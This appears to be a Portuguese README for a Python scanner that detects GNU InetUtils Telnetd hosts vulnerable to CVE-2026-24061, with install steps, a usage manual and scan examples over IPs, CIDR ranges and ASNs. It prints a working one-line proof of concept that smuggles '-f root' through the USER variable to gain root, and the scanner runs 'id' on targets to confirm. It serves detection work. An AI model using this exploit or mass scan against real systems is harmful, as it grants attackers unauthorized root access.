
CVE-2026-24061 - Bypass de Autenticação Remota no Telnetd do GNU InetUtils
Um scanner Poderoso, Rápido e Elegante para detectar serviços Telnetd vulneráveis afetados por CVE-2026-24061. Construído com a biblioteca padrão pura de Python - zero dependências externas necessárias.
CVE-2026-24061 é uma vulnerabilidade crítica de bypass de autenticação no Telnetd do GNU InetUtils que permite que atacantes remotos não autenticados obtenham acesso root explorando o tratamento da opção NEW-ENVIRON.
A seguir está a configuração do serviço Telnetd no lado do host alvo.
E aqui está a Prova de Conceito (PoC) para esta vulnerabilidade, que pode ser executada manualmente a partir do host do atacante simplesmente executando o comando USER="-f root" telnet -a <TARGET_HOST> 23.
A vulnerabilidade explora a validação inadequada da variável de ambiente USER na negociação da opção NEW-ENVIRON (RFC 1572) do telnet, permitindo que atacantes injetem valores maliciosos como -f root para contornar a autenticação.
9.8 (Crítico) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
# Clone o Repositório
cd /opt
sudo git clone https://github.com/madfxr/Twenty-Three-Scanner.git
cd Twenty-Three-Scanner
# Torne Executável
sudo chmod +x twenty-three-scanner.py
# Execute o Script
sudo python3 twenty-three-scanner.py -h
A seguir está um manual para a ferramenta Twenty-Three Scanner que pode ser usada para detectar a vulnerabilidade CVE-2026-24061 - Bypass de Autenticação Remota no Telnetd do GNU InetUtils.
usage: python3 twenty-three-scanner.py [-h] [-t TARGET] [-f FILE] [-a ASN] [-p PORT] [--threads N] [--user-value VALUE] [--connect-timeout SEC] [--read-timeout SEC] [--id-timeout SEC]
[--max-hosts-per-cidr N] [--max-total-hosts N] [--skip-large-networks] [-o FILE] [-v]
CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass
options:
-h, --help show this help message and exit
Target Options:
-t TARGET, --target TARGET
target IP, CIDR, or comma-separated list (can be used multiple times)
-f FILE, --file FILE file containing targets (one per line, supports comments with #)
-a ASN, --asn ASN autonomous system number (e.g., AS10111 or 10111)
Scan Options:
-p PORT, --port PORT target port(s), comma-separated (default: 23)
--threads N number of concurrent threads (default: 50)
--user-value VALUE USER environment variable value for exploit (default: '-f root')
Timeout Options:
--connect-timeout SEC
TCP connection timeout in seconds (default: 3.0)
--read-timeout SEC socket read timeout in seconds (default: 2.0)
--id-timeout SEC 'id' command response timeout in seconds (default: 2.0)
Limit Options:
--max-hosts-per-cidr N
maximum hosts to scan per CIDR block (default: 1024)
--max-total-hosts N maximum total hosts across all targets (default: 50000)
--skip-large-networks
skip networks larger than /16 (avoids accidentally scanning huge ranges)
Output Options:
-o FILE, --output FILE
save vulnerable hosts to file (format: IP:PORT)
-v, --verbose enable verbose debug logging
E aqui estão alguns exemplos de como usar o comando.
# Scan Single IP Address, and Single Port
sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23
# Scan Single IP Address, and Multiple Ports
sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23,2323
# Scan Multiple IP Addresses, and Single Port
sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23
# Scan Multiple Addresses, and Multiple Ports
sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23,2323
# Scan CIDR Range, and Single Port with Results
sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23 -o results.txt
# Scan CIDR Range, and Multiple Ports with Results
sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23,2323 -o results.txt
# Scan Single IP Address, Multiple Addresses, or CIDR Range from File, and Single Port with Custom Thread and Output
sudo python3 twenty-three-scanner.py -f targets.txt -p 23 --threads 100 -o output.txt
# Scan Single IP Address, Multiple IP Addresss, or CIDR Range from File, and Multiple Ports with Custom Threads and Output
sudo python3 twenty-three-scanner.py -f targets.txt -p 23,2323 --threads 100 -o output.txt
# Scan ASN and Single Port with Custom Threads
sudo python3 twenty-three-scanner.py -a 10111 -p 23 --threads 100
sudo python3 twenty-three-scanner.py -a AS10111 -p 23 --threads 100
# Scan ASN and Multiple Ports with Custom Threads
sudo python3 twenty-three-scanner.py -a 10111 -p 23,2323 --threads 100
sudo python3 twenty-three-scanner.py -a AS10111 -p 23,2323 --threads 100
# Scan ASN with Custom Limits and Custom Threads
sudo python3 twenty-three-scanner.py -a 10111 --max-hosts-per-cidr 2048 --threads 100
sudo python3 twenty-three-scanner.py -a AS10111 --max-hosts-per-cidr 2048 --threads 100
Varredura de um Único Endereço IP com Múltiplas Portas.
Varredura de Múltiplos Endereços IP com uma Única Porta.
Varredura de Faixa CIDR com uma Única Porta.
Varredura de ASN com Múltiplas Portas.
Varredura de um Único Endereço IP, Múltiplos Endereços ou Faixa CIDR a partir de Arquivo, e uma Única Porta com Thread e Saída Personalizados.